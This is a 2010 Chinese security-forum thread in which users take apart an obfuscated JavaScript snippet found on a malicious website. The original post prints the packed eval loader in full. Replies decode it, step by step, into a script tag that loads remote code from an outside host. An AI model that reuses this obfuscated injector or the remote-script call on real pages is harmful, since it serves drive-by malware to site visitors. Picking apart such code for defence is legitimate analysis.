瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 求解这段加密代码
sweay - 2010-1-29 16:49:00
<script language="javascript" type="text/javascript">eval(function(p,a,c,h,e,i){e=function(c){return c};if(!''.replace(/^/,String)){while(c--)i[c]=h[c]||c;h=[function(e){return i[e]}];e=function(){return'\\w+'};c=1};while(c--)if(h[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),h[c]);return p}('30["\\29\\15\\4\\20\\10\\7\\21\\0"]["\\16\\5\\3\\0\\7"]("\\13\\6\\4\\5\\3\\2\\0 \\28\\1\\21\\19\\20\\1\\19\\7\\11\\"\\27\\1\\18\\1\\26\\4\\5\\3\\2\\0\\" \\0\\17\\2\\7\\11\\"\\0\\7\\14\\0\\/\\25\\1\\18\\1\\6\\4\\5\\3\\2\\0\\" \\6\\5\\4\\11\\"\\24\\0\\0\\2\\23\\/\\/\\10\\17\\8\\9\\9\\0\\16\\0\\8\\4\\15\\10\\/\\9\\3\\1"+"\\22\\3\\8\\1\\6\\2\\14\\"\\12\\13\\/\\6\\4\\5\\3\\2\\0\\12");',10,31,'x74|x61|x70|x69|x63|x72|x73|x65|x2e|x71|x6d|x3d|x3e|x3c|x78|x6f|x77|x79|x76|x67|x75|x6e|x62|x3a|x68|x6a|x53|x4a|x6c|x64|window'.split('|'),0,{}));</script>
fengxingjudy - 2010-1-29 16:58:00
<script language="JavaScript" type="text\/javascript" src="http://my.qqtwt.com/qiabi.aspx"></script>
Dmlt - 2010-1-29 16:58:00
能不能说下 解密方法??
:kaka2:
leo108 - 2010-1-29 17:08:00
首先,把eval(function替换成document.write(function
保存成网页,打开,得到代码
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
然后在下面代码空白处贴上上面的代码
<script>
alert('


')
</script>
保存为网页,打开之后就得到解密代码
:kaka9:
sweay - 2010-1-29 17:08:00
初步解出是
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");

16进制的
document.write
送你回城卷 - 2010-1-29 17:21:00
http://www.521yy.com/%E7%AB%99%E9%95%BF%E5%B7%A5%E5%85%B7/


加密解密工具
ty88 - 2010-1-29 18:42:00

执行EVAL清除即可
暗夜的雪 - 2010-1-30 13:11:00
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");


个人认为这段代码属于Shallcode  利用FreShow解密工具  替换掉\x为%u 再用两次ESC解密。。  不过好像最后也没什么结果    :kaka8:
暗夜的雪 - 2010-1-30 13:18:00
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x6d\x79\x2e\x71\x71\x74\x77\x74\x2e\x63\x6f\x6d\/\x71\x69\x61"+"\x62\x69\x2e\x61\x73\x70\x78\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");


经过进一步解码,发现不用替换掉  “\x “  了,因为已经通过前一步骤解出了一遍,直接把这段代码放到FreShow里面,用ESC解密即可  得到如下代码:
window["document"]["write"]("<script language="JavaScript" type="text/javascript" src="http://my.qqtwt.com/qia"+"bi.aspx"></script>"); 

上面就该是病毒程序了。。。

的确是一段ShallCode。。。

附件是FreShow界面~  不知道怎么加图片  呵呵  小白了~
sweay - 2010-1-30 16:51:00
谢谢 各位热心解答。
非常感谢
学习到了很多
是昔流芳 - 2010-1-30 17:00:00


引用:

Shellcode网马特征:以相同分隔符(一般为%u)分隔的4位一组的十六进制字符串。
暗夜的雪 - 2010-2-1 2:05:00
呵呵,本人新手,现在知道出现“\x ” 就基本确定是ESC了~ :kaka12:
1
查看完整版本: 求解这段加密代码